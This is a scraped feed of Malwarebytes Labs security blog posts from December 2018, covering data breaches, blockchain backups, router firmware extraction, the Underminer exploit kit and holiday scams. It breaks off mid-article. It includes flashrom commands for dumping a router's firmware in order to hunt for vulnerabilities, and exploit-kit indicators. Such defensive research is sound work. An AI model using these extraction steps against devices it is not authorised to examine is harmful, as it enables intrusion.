Techie Feeds

2018: The year of the data breach tsunami

Malwarebytes - Fri, 12/28/2018 - 16:00

It’s tough to remember all of the data breaches that happened in 2018. But when you look at the largest and most impactful ones that were reported throughout the year, it paints a grim picture about the state of data security today.

The consequences of major companies leaking sensitive data are many. For consumers, it represents a loss of privacy, potential identity theft, and countless hours repairing the damage to devices. And it’s costly for companies, too, in the form of bad press and the resulting damage to their reputation, as well as time and money spent to remediate the breach and ensure customers’ data is well secured in the future.

But despite the well-known costs of data breaches, the problem of leaky data isn’t getting better. While there were a greater number of breaches in 2017, 2018 saw breaches on a more massive scale and from marquee players, such as Facebook, Under Armor, Quora, and Panera Bread. Cybercriminals stole sensitive personally identifiable information (PII) from users, including email and physical addresses, passwords, credit card numbers, phone numbers, travel itineraries, passport data, and more.

You’d think these problems would cause companies to be extra diligent about discovering data breaches, but that doesn’t seem to be case. In reality, companies rarely discover data breaches themselves. According to Risk Based Security, only 13 percent of data breaches are discovered internally.

To help people better understand the modern problem of data breaches, TruthFinder created this infographic. It clarifies the extent of the crisis using statistics from the Identity Theft Threat Center and Experian. Take a look at the infographic below to get sense of why 2018 was the year of the data breach tsunami.

The post 2018: The year of the data breach tsunami appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Using the blockchain to create secure backups

Malwarebytes - Thu, 12/27/2018 - 17:34

“Oh no! I’ve got a ransomware notice on my workstation. How did this happen?”

“Let’s figure that out later. First, apply the backup from a few minutes ago, so we can continue to work.”

Now that wasn’t so painful, was it? Having a rollback solution or a recent backup could make this ideal post ransomware–infection scenario possible. But which technology could make this work? And is it possible today?

As we have pointed out before, blockchain technology is not for cryptocurrencies alone. In fact, a few vendors are already offering to use the blockchain to create recent, secured backups.

Backups

With ransomware still one of the most prevalent threats, having backups is one of the most advised strategies against having to pay a ransom. Paying ransoms not only fuels the ransomware industry, it is likely to become illegal in some states and countries.

For backups to be as effective as possible:

  • They need to be recent.
  • They shouldn’t be destroyed in the same accident or incident as the originals.
  • They should be secure against tampering and theft.
  • They should be easy to deploy.

To achieve these goals, creating backups in several locations, on different media, and encrypted if necessary goes a long way. This is exactly why using blockchain technology makes sense.

Blockchain

A quick reminder about how blockchain works. Blockchain is a decentralized system that can keep track of changes in the form of a distributed database that keeps a continuously growing list of transactions. Every change in the block results in a different hash value. This provides the opportunity to add a digital signature to each set of data. So, ideally you can be sure that the backup you are about to deploy is recent and hasn’t been tampered with by unauthorized hands.

How it should work

Blockchain technology is a decentralized ledger. Each transaction keeps an identical copy of the previous one. The authenticity of the copies can be confirmed by any of the nodes. The nodes are the “workers” that calculate a valid hash for the next block in the blockchain.

This means that if the first block would hold an encrypted copy of all the files you use today, each next block would include a copy of that set plus all the changes that have been made before the next hash that was accepted by the network of nodes. And each next block would hold all the information in the previous one plus all the changes since then.

Since every node has access to the list of changes, this makes the process completely transparent. Every transaction is recorded, and adding a fingerprint hardens the process against tampering. The architecture of the blockchain makes it impossible to manipulate or change the outcome, and it takes consensus from the nodes to create a legal “fork.”

“Fork” is the term used to describe the situation where two or more valid chains of blocks exist. Or better said, where two blocks of the same height, or with the same block number in the following order, exist at the same time. In a normal situation, the majority decides for one block as the foundation for the rest of the chain and the other fork is abandoned. Sometimes forks are used on purpose to split off a chain for a change in protocol. These are called “hard forks.”

Possible additional features

Timestamps: A backup method using this kind of blockchain technology could also be used as legal proof that a document has not been changed since the time it was included in the backups.

History of changes: A similar method can also be used to keep track of the authorized changes that were made to a document, and record when they took place and who made them.

Pitfalls

Companies looking to deploy blockchain technology to create secure backups need to heed a few pitfalls, especially if they intend to limit the number of nodes to keep them inside the company.

Small networks are vulnerable to attacks by the majority. Blockchain technology is constructed so that the majority decides. And if you can find a way to provide more than half of the computing power active on the network, you can create your own false fork. In cryptocurrencies, such an attack can allow double spending, which leaves one receiving end in the cold. Some cryptocurrencies like Bitcoin Gold (BTG) have found out the hard way that these so-called 51 percent attacks can work. It cost exchanges several millions of dollars.

Another possible problem with keeping the number of nodes small is the Sybil attack. A Sybil attack happens when a node in a network uses multiple identities. This is a procedure that can allow an attacker to outvote honest nodes by controlling or creating a majority. Where a 51 percent attack would be solely based on computing power, some networks use a factor called “reputation” as an additional weighing factor for the influence of the nodes.

Your node controls the Sybil nodes attempting to gain total control. Image courtesy of CoinCentral.

User behavior is always a concern. You can create the safest backup system, but a disgruntled employee could frustrate the whole effort. And insiders do not even have to have bad motives to corrupt the system. They may do it out of ignorance or with the best intentions. They may want to sweep something under the rug and unwittingly remove or corrupt more than they expected.

Deleted files could be a problem in some setups. This is something to keep in mind. Having the hash of the deleted file and the date when it was removed may not always be satisfactory. Even if you know when and by whom a file was deleted, that will not bring it back. Depending on the way the backup system is set up, this may be solved with some digging in old backups, or they may be lost forever.

The underlying problem for this is: Do you want every version of every document to be available at all times, or is it okay to have the original and the latest version with a historical overview of when it was changed and by whom? Ideally there should be some middle ground, for example, complete backups once a year and incremental backups done by the blockchain.

Large node networks

To prevent any type of majority attack, companies could decide to use larger, established networks like the Ethereum Project, but this may collide with policies of not sharing any kind of data outside their own network. Even if it is only the hashes and timestamps of the filesystem, this could clue others into what’s going on. And the costs for the nodes calculating the hashes (the miners) could prove to be more expensive than current backup solutions.

So when can we expect to see this happening?

I think we will see more progress made in this field in the near future. Incremental backup and keeping track of changes has blockchain written all over it. But a viable solution should have a large network behind it. And there are some other pitfalls to keep in mind when designing and setting up such a backup system. It may not be ready yet to be your only solution, but it seems to be an ideal fix to have incremental backups on a blockchain combined with full backups at set intervals.

The post Using the blockchain to create secure backups appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Assessing the security of a portable router: a look inside its hardware, part deux

Malwarebytes - Wed, 12/26/2018 - 19:15

In part two of our blog assessing the security of a portable router, we will acquire the tools and equipment to make a copy of the firmware on our target router so that we can assess the full firmware.

Sometimes, the manufacturer has an updated firmware that is available on their website. It could be just that—an update—and therefore incomplete. We want to be able to compare the updated and existing firmware to see what was changed.

With a complete firmware, we can browse the file system of the router and look for interesting security developments. Is there an administrative backdoor? Is there functionality that might be undocumented or concerning?

Ultimately, we want to better understand how this device works, and without the complete picture, that isn’t possible (or it’s significantly harder).

More shopping

The third arm solution I had purchased in our first blog was under performing. It didn’t have enough arms, was a little on the flimsy side, and tended to tip over easily. I purchased a more robust solution. This will be used to hold the router, lights, USB microscope, and other devices when we acquire the firmware.

This contraption looks like a space octopus is on my desk, but is infinitely more useful.

We will also need a SOIC 8 PIN clip.

This will be used to connect to the eeprom without de-soldering the actual chip. (Desoldering tends to result in the chip not working ever again, at least for me.) I bought several SOIC clips, mainly because my original was taking forever to get here, and also because I read online comments on how effectiveness varied wildly between the “cheap” SOIC clips and the more expensive ones. The cheap ones have a tendency to pop off if the cabling is disturbed.

I also bought some jump wires for plumbing the clip to any diagnostic device I choose to use.

In addition, I bought a small USB microscope. Nothing fancy: 200X magnification. The writing on the chips was so small that I was struggling to read it. SuperEyes touts its use for dental purposes. It works fine for reading the small markings on various chips, too.

Acquisition hardware

There are several options to achieve this. The most common one is the Bus Pirate from Dangerous Prototypes.

 

After some online research, I found that there are several versions of the Bus Pirate available. I elected version 3 (v3.6 to be precise) after seeing this comment on the Dangerous Prototype page: Bus Pirate v3 is still the best choice if you want something you can use without a lot of hassle. The v4 firmware is rough around the edges, but it is improving all the time.

I bought three Bus Pirates in total: two v3.6’s and a v4.0. The plan is to have a stock v3.6, with whatever loader and firmware it comes with, and have a spare to update it to the community loader and community firmware that can be found here.

The 4.0 Bus Pirate is for the remote possibility that neither 3.6’s or other solutions work successfully. (The Bus Pirate v4 is still making its way though our postal system.)

The Bus Pirate has the highest number of blog posts and YouTube videos demonstrating its use, but during my research, I came across some information that gave me some pause.

The development by Dangerous Prototypes of the Bus Pirate seems to have stopped. It could be that it has all the needed features, but when I used the Bus Pirate in conjunction with flashrom, the software I used on my Linux development machine, it complained about the firmware revisions that came with my v3.6 models.

Further research also turned up the Shikra, made by Xipiter. I also acquired one of these, with the intention to use it to dump the router firmware with it and compare it to the one acquired with the Bus Pirate. It never hurts to have multiple ways of achieving the same results.

Let’s begin!

A fast and loose rule, when looking at the router mainboard, is that the big chip in the center is the processor, and the small chip at the side is an eeprom. If there’s any doubt, Googling the numbers on all the chips will help identify them. In some cases, there will be three chips and the third will be RAM. Some more fully featured devices may have even more chips.

In our case, we’re looking for the eeprom. The eeprom is used to store relatively small amounts of data, but allows individual bytes to be erased and reprogrammed. Hardware manufacturers can get clever by erasing the chip identifiers, covering them up in epoxy, or even both. Ours was just hard to read.

The eeprom on our target device is the smaller chip, with 8 “feet” as seen on the left of this picture.

Once we have dumped the firmware, we can also compare the latest firmware available on the website of manufacturer and the one we extracted. If we were hunting for vulnerabilities, it would actually be preferable for us to have an older firmware on our router. It gives us good hints as to what was changed in the new version. What did the patch address?

Investigating the eeprom

Rather than using the Chinese language only application that came with the SuperEyes microscope, I installed “Cheese” in Linux. Cheese can use any webcam detected, so I selected the USB 2.0 camera in the preferences and was able to use it in Ubuntu.

And here is where things get fuzzy. We have to map the pin out of the eeprom to the SOIC clip pins, and then from the SOIC clip to the BusPirate or the Shikra interface. We can Identify pin 1 by the dot on the chip, but we need to go online and try to find the data sheet for this chip to know how to connect it. I Googled several data sheets and wasn’t able to find an exact match.

At this point we could use an oscilloscope, but thats a little out of our budget, so we’re going to fudge it and use the pin from a similar eeprom chip and hope for the best.

Many of the searches I conducted indicated that this might be a Gigadevice chip. While there doesn’t seem to be a standard for which pins do what, most of the data sheets have diagrams such as this one:

I connected the SOIC chip clip by grabbing the chip. Seen from directly above, it would look like this:

And I used the microscope to verify that the pins were properly seated and making contact with the “feet” of the eeprom, as such:

The protocol we will be using to read the eeprom is SPI, and the Shikra pin documentation has a chart for SPI. We need to map the pins from the eeprom to the Shikra to successfully dump the contents of the chip. I investigated each acronym from the chip, as well as each for the Shikra (for SPI) and made a chart to know which pins go from one to the other. The eeprom is on the left of the chart; the Shikra is on the right.

And here is the finished result, from chip to clip, through jump wires to Shikra.

On our research Linux laptop, we can issue the command “$ dmesg | grep tty” to confirm the Shikra is properly detected and is located at ttyUSB0. This is what we should see as an output:

We will need an application called flashrom. A simple “$ sudo apt-get install flashrom” will do this for us. To dump the firmware, we issue this command to the Shikra “$ flashrom -p ft2232_spi:type=232H -r spidump.bin”

Flashrom identifies the chip as a GD21Q16(B) and, armed with this knowledge, Google searches yielded the exact data sheet. It feels like the long way around to get the proper data sheet in PDF form, but our gamble paid off. We now have a dump of the eeprom and we can continue our research. I reproduced the same steps as the ones I had done with the Shikra with the Bus Pirate and dumped the firmware with it as well. The Bus Pirate did take considerably longer to dump the firmware.

Flashrom did complain somewhat during the dumping process when I used the Bus Pirate, but it completed successfully.

Until next time

So we now have the firmware that was on the router. In our next and final part of this blog series, we will look at the firmware we extracted and see if we can find any vulnerabilities or other interesting changes. We will also look at the updated firmware we downloaded from the manufacturer’s website and compare the two.

The post Assessing the security of a portable router: a look inside its hardware, part deux appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 17 – 23)

Malwarebytes - Mon, 12/24/2018 - 18:56

Last week on Labs we looked at Fuchsia OS as a possible alternative for Android, explained all the reasons why cybercriminals want to hack your phone, discussed a flaw in Twitter form that may have been abused by nation states, gave you a Christmas tech scams roundup, revealed why many online quizzes qualify as phishing scams, gave some tips about safely using those smart speakers you got for Christmas, pointed out that the Underminer exploit kit improved its latest iteration, and reminded everyone that Chromebooks can and do get infected.

Other cybersecurity news
  • PewDiePie hackers strike again: hackers claimed that they launched yet another attack tricking hundreds of thousands of printers globally to print pamphlets promoting YouTube celebrity “PewDiePie.” (Source: ThreatPost)
  • Equifax breach was entirely preventable: the Republican majority staff of the U.S. House of Representatives Committee on Oversight and Government Reform says the hack attack and subsequent data breach suffered by credit reporting agency Equifax in 2017 “was entirely preventable.” (Source: BankInfoSecurity)
  • Top 100 worst passwords of 2018: after evaluating more than 5 million passwords leaked on the Internet, SplashData found that computer users continue using the same predictable, easily guessable passwords. (Source: TeamsID)
  • Twitter memes to deliver malware commands: attackers developed a way to use memes posted to Twitter to control RAT-infected computers. The operators use steganography to hide the instructions in images, which the malware then parses and executes. (Source: TechSpot)
  • Cloudflare providing DDoS protection for terrorist websites: Cloudflare is facing accusations that it’s providing cybersecurity protection for at least seven terrorist organizations—a situation that some legal experts say could put it in legal jeopardy. (Source: Gizmodo)
  • Government user credentials found on Dark Web: researchers from Group-IB have discovered more than 40,000 user accounts on the Dark Web that appear to be compromised credentials for online government websites in 30 countries. (Source: SecurityWeek)
  • Remote firmware attack renders servers unbootable: security researchers have found a way to corrupt the firmware of a critical component usually found in servers to turn the systems into an unbootable hardware assembly. (Source: BleepingComputer)
  • How hackers bypass Gmail 2FA: a new Amnesty International report goes into some of the technical details around how hackers can automatically phish two-factor authentication tokens sent to phones. (Source: Motherboard)
  • Pile of EU diplomatic cables nicked: the New York Times has published what it says are excerpts from hacked EU diplomatic cables obtained after discovering passwords that let them into a low-level EU database of diplomatic messages and cables. (Source: The Register)\

Stay safe, everyone!

The post A week in security (December 17 – 23) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Underminer exploit kit improves in its latest iteration

Malwarebytes - Fri, 12/21/2018 - 21:34

One of the most interesting exploit kits we track is also a bit of an elusive one, and as such does not receive the same scrutiny as its RIG and Fallout counterparts. Underminer was mentioned in our Fall 2018 round up, and at the time was using CVE-2018-8174 (Internet Explorer) and CVE-2018-4878 (Flash Player up to version 28.0.0.137).

In mid-December, we noticed some changes with Underminer that prompted us to take a deeper look. This happened around the same time frame as new zero-days and proof of concepts were available, which is typically an opportune moment for exploit kit authors to integrate.

Previous version and artifacts

The CVE-2018-4878 vulnerability is somewhat easy to spot within network traffic because it leaves some artifacts behind. Indeed, we use these in our lab and correlate them with other IOCs.

Traffic view of Underminer EK in November, showing CVE-20184878 artifacts

As documented in our previous blog post, Underminer uses client-server key exchange when it delivers its IE exploit, which encrypts the code but also prevents analysts from replaying it from a saved network capture. However, its SWF exploit up until now was deployed without such protections in place and could therefore be re-analyzed on its own.

New covert Flash exploit

The exploit appears to have changed as of mid-December. First, we did not see the Flash artifacts as we did before, which prompted us to test this exploit with a more recent version of Flash instead (31.0.0.153).

Traffic view of the latest Underminer EK using a different Flash exploit implementation

Second, we saw a new snippet of code within the SWF exploit landing page referencing a getSalt() function. This stoked our curiosity, and as we compared various traffic captures, we noticed that the function would always return different values.

Looking at the SWF exploit itself, we saw code that interacts with the launcher page’s JavaScript (ExternalInterface.call) and grabs that value in order to pass it to another function that decodes the exploit. When we attempted to replay the malicious SWF “artificially,” it would not fire properly.

Malwarebytes Anti-Exploit triggering with Flash Player 31.0.0.153

Because the version of Flash we used was 31.0.0.135 (the latest Flash Player was not affected in our tests), we believe Underminer implemented the recent CVE-2018-15982.

The way the final payload is packaged and executed remains unique to Underminer. It’s what we call Hidden Bee. Hidden Bee is a custom payload that has specific modules and lacks the structure of the typical PE format. For this reason, it is more difficult to analyze and gives the attackers more flexibility than if they were using simple shellcode instead.

Malwarebytes users are already protected against this exploit kit, as we block both the Internet Explorer and Flash Player exploits.

Indicators of compromise (IOCs)

Underminer IP:

98.126.222[.]187

Flash exploit

d75710ebc8516e73e3a8dd7d1ad1ebc3221b7a141659c7e84b9f5f97dd7ec09e

Custom payload

5574f4b0b507130db06072930016ed5d2ef79aaa1262faddfdb88891c1599672

The post Underminer exploit kit improves in its latest iteration appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Smart speakers: Christmas treat or lump of coal?

Malwarebytes - Fri, 12/21/2018 - 17:30

Christmas is nearly upon us, and thoughts are perhaps turning to various digital presents of a “smart” nature. Home security, hubs, speakers, cameras, and mashups of all of those and more besides.

With regards to speakers, the most immediate pieces of your home are theoretically at your beck and call.

There’s lots of good advice out there in terms of what to do with your new devices. Untick boxes, increase security, perhaps eliminate the “smart” feature entirely by ripping out batteries. However, is it possible that we’re taking things a little too far? Are our concerns justified? Is there, perhaps, a somewhat happy middle ground where these devices can co-exist with us minus an endless sense of panic?

Well, probably not. But maybe we can alleviate a few fears along the way.

Accidents will happen

This is a fact of life. Nothing is 100 percent secure, and nothing is 100 percent free from errors and mishaps. While this is scant consolation if something goes disastrously wrong, accepting that nothing is perfect sometimes goes a long way.

Many of the more “oh no, now what” news stories about smart speaker devices involved an accident, or an unforeseen use of the technology at hand.

Of dollhouses, cookies, and burgers

Many reported incidents are about accidental interactions between users and their devices. Of particular note is the 2017 story of a child somehow managing to place an order for a dollhouse and cookies through Amazon’s Alexa. This became even more confusing when a TV segment apparently caused chaos with a number of additional attempted orders. It’s worth noting that none of those additional attempts seem to have resulted in purchases, so either we’re missing some crucial part of the child’s story or something genuinely malfunctioned in their home.

We also have South Park pranks, and the infamous Burger King ad triggering Google Home to tell their owner all about burgers via text read out aloud from Wikipedia. While this is humorous, it could have easily invited some incredibly dubious messages into the home given anyone can edit Wikipedia text. In fact, the ad text was indeed sabotaged. What a world.

Privacy problems

Accidental recordings are perhaps the biggest potential problem, and certainly most likely to cause a privacy issue. In May 2018, a series of miscues caused private conversations to be sent to a random contact via an Echo speaker. This is, of course, horrendous and could easily have ended in disaster depending on context.

It’s also essential that device owners read all EULAs and privacy policies thoroughly. They’re complicated enough for simple mobile games, without pondering the ramifications of real-world interactions. As I mentioned on Top 10 VPN’s Privacy Central article about this very subject, even if you read through a lot of legal words, there’s no guarantee everything won’t change while you’re not looking.

Listen closely?

The potential threat of always listening devices is prone to overhyping. The biggest issue tends to be accidental activation, from adverts or background noise. It’s rare for speakers to malfunction and listen of their own accord.

Owners may wish to disallow voice-activated devices from being able to lock or unlock entry points into the house, as this is an area of deliberate activation which could cause the most harm. They certainly don’t collect everything said and are deliberately set up to avoid it. Grabbing everything 24/7 would mean device manufacturers simply couldn’t cope with all the data, so it’s in their best interests to be as concise and targeted as possible.

As evidenced by Mozilla’s recent “Privacy not included” list, people seem to have a strong aversion to smart speakers. Amazon and Google’s devices are currently rated “super creepy” by voters, whereas the only smart speaker to have a positive “not creepy” rating at all is the open source Mycroft Mark 1. With a lack of insight into how closed systems are operating inside the home, it perhaps makes sense that people would turn to open source devices where they can get a better understanding of what’s happening instead.

What’s the biggest area of concern?

As I’ve mentioned previously, I believe rogue IoT devices pose the biggest threat to victims of domestic abuse. This is due to ease of access to devices on the part of the malicious individual. The ability to control aspects of the home down to the smallest detail is a potential nightmare scenario. There are ways to combat this, but it’s risky and we always suggest professional support and assistance wherever possible.

Who speaks the truth?

All we can do is look at the evidence on offer and make an informed decision. If you’re okay with the possibility of occasional accidental misfires or mischievous triggers, you’re good to go. We can’t pretend these devices won’t continue to make their way into our homes. What we can do is ensure we take steps to limit harm wherever possible. Keep on top of possible threats as and when they surface, and you’ll hopefully have no problems this festive season.

The post Smart speakers: Christmas treat or lump of coal? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

This online quiz is now confirmed to be a phishing scam

Malwarebytes - Thu, 12/20/2018 - 18:30

Ah, online quizzes. Many of us know that they can be somewhat dodgy and nonsense, really—but that doesn’t stop us from clicking the “Start quiz” button anyway. Besides, you have time to kill, and there are only three questions to answer, right?

The right kind of wrong

Phishing attacks don’t always start in your email inboxes anymore. Whether you’re on a desktop, laptop, tablet, or smartphone, there are several other vectors where users can encounter phishing attempts. And believe me, they don’t have a flashing neon sign that could easily alert users that they are after your personal information.

Phishers have been one of the most resilient cybercriminals out there to date. And Or Katz, principal lead security researcher for Akamai Technologies, has proven this point once again.

In a recently published white paper entitled “A New Era in Phishing—Games, Social, and Prizes” [PDF], Katz has confirmed what many of us have already long suspected: those short quizzes shared on Facebook, Twitter, and other social media platforms are scams. And behind them are sophisticated and coordinated efforts that were designed for prolonged user exposure to fraud campaigns.

Katz and his team have studied 689 customized phishing campaigns that banked on 78 popular names of brands across industries. These brands include United Airlines, Target, Disneyland, and Dunkin’ Donuts. All quiz-based phishing pages follow a templated format: They ask three questions and, once a user answers them—note that they don’t have to be correct—they promise quiz takers a prize associated with the brand they’re impersonating. For example, if the quiz is about Disneyland, quiz takers could potentially “win” free passes.

Quiz takers are then directed to a web page that asks for personal information—so they can claim the prize, of course—like their email address, physical address, and age.

The toolkit behind these “positive” phishing campaigns

Phishing kits are a staple to a serious phisher’s fraud arsenal. These nifty and reusable tools are popular in the underground market because they do most of the work with little effort from the scammers. It also makes phishing campaign creation a lot faster.

According to this accompanying blog post to the Akamai paper, the quiz-driven phish kits they studied use the following social engineering tactics to gain user trust:

  • A customized “brand” website, wherein they display logos and brands of trusted companies they use to lure in targets and get them comfortable to answer the quiz questions.
  • A call to action, wherein they create a sense of urgency, so the target would likely complete the quiz or give out information without thinking. One example of this is claiming that the high-valued prize can only be won by a limited number of quiz takers, so they need to get a move on.
  • Multiple fake endorsements in social media, wherein fake social network profiles are used to strengthen the legitimacy of the supposed brand’s offer. By showing the target that several people have already won and claimed the prize, the target would doubt less. It’s also required for the target to share the link to the quiz in social media channels—a classic survey scam.

Screen captures of sample sites using the same phish kit for the Three Questions Quiz scam (Courtesy of Akamai Technologies)

Other phishing campaign findings
  • The brands abused by phishers in their campaign are companies that belong to airlines, retail, and food and beverage industries.
  • 82 percent of the actual domains used in these phishing campaigns have leveraged typosquatting.
  • Newer versions of the phishing kit include added features, such as automatic translation—which makes the scam accessible to non-English speakers—and new fake social network profiles—which makes the scam more reliable and dynamic.
  • Phishing campaigns that use social networks are more effective compared to traditional phishing.
A new phishing campaign to watch out for

Akamai has predicted that phishing campaigns of this nature—or those that play on a positive aspect of instead of a negative one, as in traditional phishing—will only increase in the future. Instead of using scare tactics, phishers have now learned to exploit game mechanics and further tap into people’s curiosity and desire for freebies. In the process, phishers have made Internet users receptive to them, without users realizing it.

Users are advised to be more vigilant and critical when it comes to offers of freebies online, regardless of the form they are presented in, until they have verified that the offers are legitimate. While it may be fun to waste time on quizzes a contact happens to have shared on Facebook, it would be wise to give it a pass, and perhaps warn the poor fellow via PM that he might have been duped to give up his personal information to scammers.

The post This online quiz is now confirmed to be a phishing scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Christmas tech scams roundup

Malwarebytes - Thu, 12/20/2018 - 17:30

There’s a fair few Christmas tech scams floating around out there as 2018 winds up, and we thought it’d be a good time to warn you about them. It’s the usual mish-mash of phone antics, social media shenanigans, and click bait. Shall we begin?

This scam looks divine

BOOM reports on a collection of anti-aging cream websites targeting regions such as the Philippines, Malaysia, Mexico, and Colombia. Numerous pages on Facebook provide a launchpad for the sites promoting the product. Alongside the cookie-cutter sites offering up the product, there are also imitation news websites claiming various movie and TV stars are promoting it. Indeed, one site claims Nicole Kidman created it. Philippines actress Carmina Villaroel had to deny any involvement with the scam in question on her Instagram page.

Many people have complained about being duped after seeing their ads on social media platforms. That, plus the fake movie/TV star claims means you should give this one a wide berth.

Netflix mail scam

Fake missives from scammers are a year-round proposition, but it pays to be wary over Christmas. Many a too-good-to-be-true offers turn out to be just that: a scam. Before you know it, your payment details are swiped and your logins are gone for good measure.

Ohio law enforcement is warning of bogus Netflix mails, with the intention being financial theft as per the “Please update your payment details” message. Netflix-themed fakes serve as a launchpad for a variety of bad behaviour. Tech support scams, account disabled shenanigans, and dubious “membership paused” attempts are all par for the course.

Bitcoin bonanza? Not exactly

Bitcoin scams involving fake Elon Musk accounts have been all the rage on Twitter for some time. Turns out Bitcoin fakeouts are also a fun little earner for scammers on Facebook, too. There may not be any pretend Musk accounts involved, but the end game is the same: make as much money as possible. They set up fake profiles imitating the company whose page they’re posting to, claiming to have partnered with Bitcoin. At this point, potential victims are encouraged to send over some digital dough to verify themselves. If you’re thinking the promised windfall of Bitcoins doesn’t materialise afterward, you’re 100 percent correct.

Hitman for hire emails

Sticking with the Bitcoin theme, we bring your attention to bogus Hitman emails offering you a chance to live in return for $4,000 in Bitcoin. Very charitable of them, but also complete and utter nonsense. Fake hitman emails have been around for many years, but there’s nothing like a bit of online intimidation to open up wallets. Take our advice and send anything you receive along these lines straight to the recycle bin.

Avoid these Facebook ads

With roughly 100 sites and around 300 individual reports claiming  certain ads are up to no good, caution is advised. Promoting various forms of tech gifts for Christmas, nothing arrives and the victim is left out of pocket. The sites themselves are also apparently not sticking around too long, making things even more difficult to sort out after the event. As always, if you combine a site you’re not familiar with and an “if it’s too good to be true…” reaction, then you’re probably on the right track.

Moral of the story here is: Christmastime isn’t always the season of good cheer and merriment—sometimes it’s also the season for ripping people off. Despite your best intentions online, whether that’s buying presents for loved ones or simply checking your email, there’s always a Grinch lurking somewhere. So be vigilant and be safe, and you can have a happy holiday yet!

The post Christmas tech scams roundup appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Flaw in Twitter form may have been abused by nation states

Malwarebytes - Wed, 12/19/2018 - 16:00

Twitter announced in a blog post on Monday that they discovered and addressed a security flaw on one of their support forms. The discovery was made on November 15 — more than a month ago — and was promptly fixed the next day. From the Twitter blog on this issue:

We have become aware of an issue related to one of our support forms, which is used by account holders to contact Twitter about issues with their account. This could be used to discover the country code of people’s phone numbers if they had one associated with their Twitter account, as well as whether or not their account had been locked by Twitter.

They go on to add:

Importantly, this issue did not expose full phone numbers or any other personal data. We have directly informed the people we identified as being affected. We are providing this broader notice as it is possible that other account holders we cannot identify were potentially impacted.

Country codes, take me home

While a country code isn’t treated or considered by many as sensitive information, some warn that it is enough to clue in attackers on whether a registered mobile number (with country code) is associated with a Twitter account. This means that cybercriminals could find the true country locations of Twitter users. This could be dangerous for those in countries with freedom of speech–related privacy concerns.

Twitter is currently investigating the possibility that the flaw may have been abused by potential nation-state actors, particularly from IP addresses associated with Saudi Arabia and China.

As if this weren’t enough of a headache for the social media giant, Peerzada Fawaz Ahmad Qureshi, an independent security researcher who goes by @Fawaz on Twitter, has stepped forward to disclose that he had reported the flaw to Twitter via HackerOne, a bug bounty platform, more than two years ago. Twitter took no action, however, deeming the bug as non-critical before marking the report an “informative” one.

Wait! That’s not all

This announcement comes hot on the heels of a Trend Micro report about malicious Twitter users abusing the social media platform to stealthily communicate with malware using stenography, the method of hiding messages in images. In this case, the malicious actors have hidden commands in memes found in every nook and cranny of Twitter—hiding-in-plain-sight at its finest.

This isn’t the first time Twitter has been used as a comms hub for malware. Back in 2009, a DIY botnet kit was discovered that brought social media–controlled infection hijinks to the masses, allowing malware authors with rudimentary skills to use Twitter to send commands.

Stock, drop, and roll

Outside of bot action, the news of Twitter’s investigation triggered a dramatic drop in the company’s stock share prices. It promises to be a rollercoaster-ride ending to 2018 for those trying to keep both Twitter and its users safe from harm.

If you use the social media platform and are worried about potential breach, Twitter’s advice is simply: do nothing. While these mishaps may have been close calls instead of direct hits, one hopes that in 2019, we’ll all be a little more proactive—and a lot more reassured—about using our favorite portals and communication channels safely.

The post Flaw in Twitter form may have been abused by nation states appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Yes, Chromebooks can and do get infected

Malwarebytes - Wed, 12/19/2018 - 15:00

As a Mac malware specialist, I’ve seen more than my share of folks saying “Macs don’t get viruses” over the years. I’ve seen and experienced first-hand that this isn’t true—even on iOS, where despite having tight, built-in security, iPhones are still capable of getting infected by rare malware. I suppose that I shouldn’t be surprised, then, when I hear someone claim that “viruses on Chrome OS don’t exist.”

Although it’s certainly true that viruses—the class of malware that spreads itself by injecting malicious code into other processes—really don’t exist to a significant degree these days, even on Windows, it’s definitely not true that any platform is impervious to malware. Chromebooks are no exception.

No admin permissions, no problem, right?

Despite popular belief, Chromebooks don’t actually run Android. They run a system called Chrome OS, where all Android apps are run in emulation. There are certainly some security improvements in Chrome OS over Android. For example, the powerful device administrator permissions on Android are unavailable on Chrome OS, limiting the amount of “bad” that malware can do.

So, if malware can’t get those permissions, it’s not serious, right? Wrong!

If I had a dime for every time I heard someone minimize some new piece of Mac malware because it couldn’t get root permissions, I’d be able to take my wife out to a nice dinner. But these permissions aren’t always relevant. Bad guys can get away with a lot of bad stuff, including stealing user data, phishing for passwords, hijacking CPU power for the purpose of a botnet or cryptomining, and more, all without admin permissions. The same is true on Chrome OS.

Android malware = Chromebooks malware

Let’s take a look at a few examples of Android malware that would work perfectly well on Chrome OS, as they don’t require anything Chrome OS doesn’t provide.

First, consider the Buzzfeed story of apps from Chinese companies that engaged in ad fraud. These apps didn’t require anything more than permission to access a number of different bits of user data. Admittedly, there was no legitimate reason those apps had to access some of that data, but when installing a new app, people are prone to click past any requests just to get the app working.

These apps don’t really do much harm to the user, of course. The primary target of the fraud are the advertising networks. But that doesn’t make it okay, and any time an app like this is “wildly over-permissioned,” as the Buzzfeed article puts it, there’s the chance of an update to the app resulting in more malicious behavior.

Image credit: Buzzfeed

A more malicious example comes in the form of some malicious cryptocurrency wallet apps found on Google Play. These apps would not require any particular device permissions, as their sole purpose is to trick the user into storing cryptocurrency in the fake wallets supported by these apps. In reality, any cryptocurrency stored cannot be withdrawn later. The perpetrator essentially stole money from the victims—and they could easily do the same to Chromebook users.

Image credit: Lukas Stefanko

Of course, affected users would have to be using cryptocurrency, so one could argue that they’d be more tech-savvy and less likely to fall for such scams. That’s not necessarily the case, but okay, let’s take a look at another example.

Consider the threat from fake antivirus software. This is software that poses as an antivirus, but provides none of the actual benefits. As described on our own blog, a family of fake antivirus software has been floating around since 2013. At one point, it was charging users $1.99 for the privilege of scanning the device, but covered up the fact that this was $1.99 per week!

This is the kind of scam many people routinely fall for and it’s universal—device, OS, and platform agnostic. Any major computer system will be afflicted with this scourge, with the exception of iOS, and even that was once plagued by fake antivirus scams. (In fact, that’s the only kind that could exist on iOS, due to the impossibility of scanning the system in any way.) If I had a dime for every person I’ve encountered who has been tricked out of their money by scammers like these, I’d have enough to take my wife out for dinner and a show!

Mac and Chrome OS parallels

